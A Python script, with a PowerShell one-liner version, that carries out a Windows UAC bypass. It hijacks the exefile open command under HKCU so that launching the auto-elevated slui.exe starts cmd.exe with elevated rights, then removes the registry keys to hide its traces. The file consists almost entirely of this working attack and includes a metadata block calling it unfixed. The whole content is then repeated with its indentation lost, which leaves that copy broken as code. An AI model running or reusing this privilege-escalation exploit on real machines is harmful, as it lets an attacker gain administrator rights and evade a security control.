makelariss/uacbypassSlui_exe.py

## uacbypassSlui_exe.py
# -*- coding: utf-8 -*-
# All credits go to https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation
'''
slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking.
Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution.
Due to the registry key being accessible from user mode, an arbitrary executable file can be injected.
'''

from _winreg import *
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
CreateKey(HKCU, 'Software\\Classes\\exefile')
CreateKey(HKCU, 'Software\\Classes\\exefile\\shell')
CreateKey(HKCU, 'Software\\Classes\\exefile\\shell\\open')
CreateKey(HKCU, 'Software\\Classes\\exefile\\shell\\open\\command')
registrykey = OpenKey(HKCU, 'Software\\Classes\\exefile\\shell\\open\\command', 0, KEY_WRITE)
print "Creating registry tree"

SetValueEx(registrykey, '', 0, REG_SZ, 'C:\\Windows\\System32\\cmd.exe')
CloseKey(registrykey)
print "Setting payload"

from ctypes.wintypes import *
from ctypes import *
shell32  = WinDLL('shell32' , use_last_error=True)

LPCTSTR = c_char_p
# Contains information used by ShellExecuteEx.
                                                              # https://msdn.microsoft.com/en-us/library/windows/desktop/bb759784(v=vs.85).aspx
class ShellExecuteInfo(Structure):                           # typedef struct _SHELLEXECUTEINFO
     _fields_ = [                                            # {
                 ('cbSize',                       DWORD),    # DWORD     cbSize;
                 ('fMask',                        ULONG),    # ULONG     fMask;
                 ('hwnd',                          HWND),    # HWND      hwnd;
                 ('lpVerb',                     LPCTSTR),    # LPCTSTR   lpVerb;
                 ('lpFile',                     LPCTSTR),    # LPCTSTR   lpFile;
                 ('lpParameters',               LPCTSTR),    # LPCTSTR   lpParameters;
                 ('lpDirectory',                LPCTSTR),    # LPCTSTR   lpDirectory;
                 ('nShow',                        c_int),    # int       nShow;
                 ('hInstApp',                 HINSTANCE),    # HINSTANCE hInstApp;
                 ('lpIDList',                    LPVOID),    # LPVOID    lpIDList;
                 ('lpClass',                      LPSTR),    # LPCTSTR   lpClass;
                 ('hKeyClass',                     HKEY),    # HKEY      hkeyClass;
                 ('dwHotKey',                     DWORD),    # DWORD     dwHotKey;
                 ('hIcon',                       HANDLE),    # union { HANDLE hIcon; HANDLE hMonitor;}
                 ('hProcess',                    HANDLE)     # HANDLE    hProcess;
                 ]                                           # }

PShellExecuteInfo = POINTER(ShellExecuteInfo)

ShellExecuteEx = shell32.ShellExecuteEx
ShellExecuteEx.restype = BOOL
ShellExecuteEx.argtypes = [
    PShellExecuteInfo
    ]

SW_SHOW = 5
SEE_MASK_NOCLOSEPROCESS = 0x00000040

ShellExecute = ShellExecuteInfo()
ShellExecute.cbSize = sizeof(ShellExecute)
ShellExecute.fMask = SEE_MASK_NOCLOSEPROCESS
ShellExecute.hwnd = None
ShellExecute.lpverb = u'runas'
ShellExecute.lpFile = u'slui.exe'
ShellExecute.lpParameters = None
ShellExecute.lpDirectory = None
ShellExecute.nShow = SW_SHOW
ShellExecuteEx(byref(ShellExecute))
print "Triggering payload PID:", windll.kernel32.GetProcessId(ShellExecute.hProcess)

DeleteKey(OpenKey(HKCU, 'Software\\Classes\\exefile\\shell\\open', 0, KEY_ALL_ACCESS), 'command')
DeleteKey(OpenKey(HKCU, 'Software\\Classes\\exefile\\shell', 0, KEY_ALL_ACCESS), 'open')
print "Deleting stuff"

'''
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\uknown> New-Item -Path "HKCU:\Software\Classes\exefile" -ErrorAction SilentlyContinue | Out-Null
PS C:\Users\uknown> New-Item -Path "HKCU:\Software\Classes\exefile\shell" -ErrorAction SilentlyContinue | Out-Null
PS C:\Users\uknown> New-Item -Path "HKCU:\Software\Classes\exefile\shell\open" -ErrorAction SilentlyContinue | Out-Null
PS C:\Users\uknown> New-Item -Path "HKCU:\Software\Classes\exefile\shell\open\command" -ErrorAction SilentlyContinue | Out-Null
PS C:\Users\uknown> New-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value "C:\Windows\System32\cmd.exe" | Out-Null
PS C:\Users\uknown> Start-Process slui.exe -Verb runas
PS C:\Users\uknown> Remove-Item -Path "HKCU:\Software\Classes\exefile\shell\open\command" -ErrorAction SilentlyContinue | Out-Null
PS C:\Users\uknown> Remove-Item -Path "HKCU:\Software\Classes\exefile\shell\open" -ErrorAction SilentlyContinue | Out-Null
'''

'''
45.
- Author: bytecode77
-    Type: Shell API
-    Method: Registry key manipulation
-    Target(s): \system32\slui.exe
-    Component(s): Attacker defined
-    Works from: Windows 8.1 (9600)
-    Fixed in: unfixed 🙈
-    How: -
'''
	# -- coding: utf-8 --
	# All credits go to https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation
	'''
	slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking.
	Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution.
	Due to the registry key being accessible from user mode, an arbitrary executable file can be injected.
	'''

	from _winreg import *
	HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
	CreateKey(HKCU, 'Software\\Classes\\exefile')
	CreateKey(HKCU, 'Software\\Classes\\exefile\\shell')
	CreateKey(HKCU, 'Software\\Classes\\exefile\\shell\\open')
	CreateKey(HKCU, 'Software\\Classes\\exefile\\shell\\open\\command')
	registrykey = OpenKey(HKCU, 'Software\\Classes\\exefile\\shell\\open\\command', 0, KEY_WRITE)
	print "Creating registry tree"

	SetValueEx(registrykey, '', 0, REG_SZ, 'C:\\Windows\\System32\\cmd.exe')
	CloseKey(registrykey)
	print "Setting payload"

	from ctypes.wintypes import *
	from ctypes import *
	shell32 = WinDLL('shell32' , use_last_error=True)

	LPCTSTR = c_char_p
	# Contains information used by ShellExecuteEx.
	# https://msdn.microsoft.com/en-us/library/windows/desktop/bb759784(v=vs.85).aspx
	class ShellExecuteInfo(Structure): # typedef struct _SHELLEXECUTEINFO
	_fields_ = [ # {
	('cbSize', DWORD), # DWORD cbSize;
	('fMask', ULONG), # ULONG fMask;
	('hwnd', HWND), # HWND hwnd;
	('lpVerb', LPCTSTR), # LPCTSTR lpVerb;
	('lpFile', LPCTSTR), # LPCTSTR lpFile;
	('lpParameters', LPCTSTR), # LPCTSTR lpParameters;
	('lpDirectory', LPCTSTR), # LPCTSTR lpDirectory;
	('nShow', c_int), # int nShow;
	('hInstApp', HINSTANCE), # HINSTANCE hInstApp;
	('lpIDList', LPVOID), # LPVOID lpIDList;
	('lpClass', LPSTR), # LPCTSTR lpClass;
	('hKeyClass', HKEY), # HKEY hkeyClass;
	('dwHotKey', DWORD), # DWORD dwHotKey;
	('hIcon', HANDLE), # union { HANDLE hIcon; HANDLE hMonitor;}
	('hProcess', HANDLE) # HANDLE hProcess;
	] # }

	PShellExecuteInfo = POINTER(ShellExecuteInfo)

	ShellExecuteEx = shell32.ShellExecuteEx
	ShellExecuteEx.restype = BOOL
	ShellExecuteEx.argtypes = [
	PShellExecuteInfo
	]

	SW_SHOW = 5
	SEE_MASK_NOCLOSEPROCESS = 0x00000040

	ShellExecute = ShellExecuteInfo()
	ShellExecute.cbSize = sizeof(ShellExecute)
	ShellExecute.fMask = SEE_MASK_NOCLOSEPROCESS
	ShellExecute.hwnd = None
	ShellExecute.lpverb = u'runas'
	ShellExecute.lpFile = u'slui.exe'
	ShellExecute.lpParameters = None
	ShellExecute.lpDirectory = None
	ShellExecute.nShow = SW_SHOW
	ShellExecuteEx(byref(ShellExecute))
	print "Triggering payload PID:", windll.kernel32.GetProcessId(ShellExecute.hProcess)

	DeleteKey(OpenKey(HKCU, 'Software\\Classes\\exefile\\shell\\open', 0, KEY_ALL_ACCESS), 'command')
	DeleteKey(OpenKey(HKCU, 'Software\\Classes\\exefile\\shell', 0, KEY_ALL_ACCESS), 'open')
	print "Deleting stuff"

	'''
	Windows PowerShell
	Copyright (C) Microsoft Corporation. All rights reserved.

	PS C:\Users\uknown> New-Item -Path "HKCU:\Software\Classes\exefile" -ErrorAction SilentlyContinue \| Out-Null
	PS C:\Users\uknown> New-Item -Path "HKCU:\Software\Classes\exefile\shell" -ErrorAction SilentlyContinue \| Out-Null
	PS C:\Users\uknown> New-Item -Path "HKCU:\Software\Classes\exefile\shell\open" -ErrorAction SilentlyContinue \| Out-Null
	PS C:\Users\uknown> New-Item -Path "HKCU:\Software\Classes\exefile\shell\open\command" -ErrorAction SilentlyContinue \| Out-Null
	PS C:\Users\uknown> New-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value "C:\Windows\System32\cmd.exe" \| Out-Null
	PS C:\Users\uknown> Start-Process slui.exe -Verb runas
	PS C:\Users\uknown> Remove-Item -Path "HKCU:\Software\Classes\exefile\shell\open\command" -ErrorAction SilentlyContinue \| Out-Null
	PS C:\Users\uknown> Remove-Item -Path "HKCU:\Software\Classes\exefile\shell\open" -ErrorAction SilentlyContinue \| Out-Null
	'''

	'''
	45.
	- Author: bytecode77
	- Type: Shell API
	- Method: Registry key manipulation
	- Target(s): \system32\slui.exe
	- Component(s): Attacker defined
	- Works from: Windows 8.1 (9600)
	- Fixed in: unfixed 🙈
	- How: -
	'''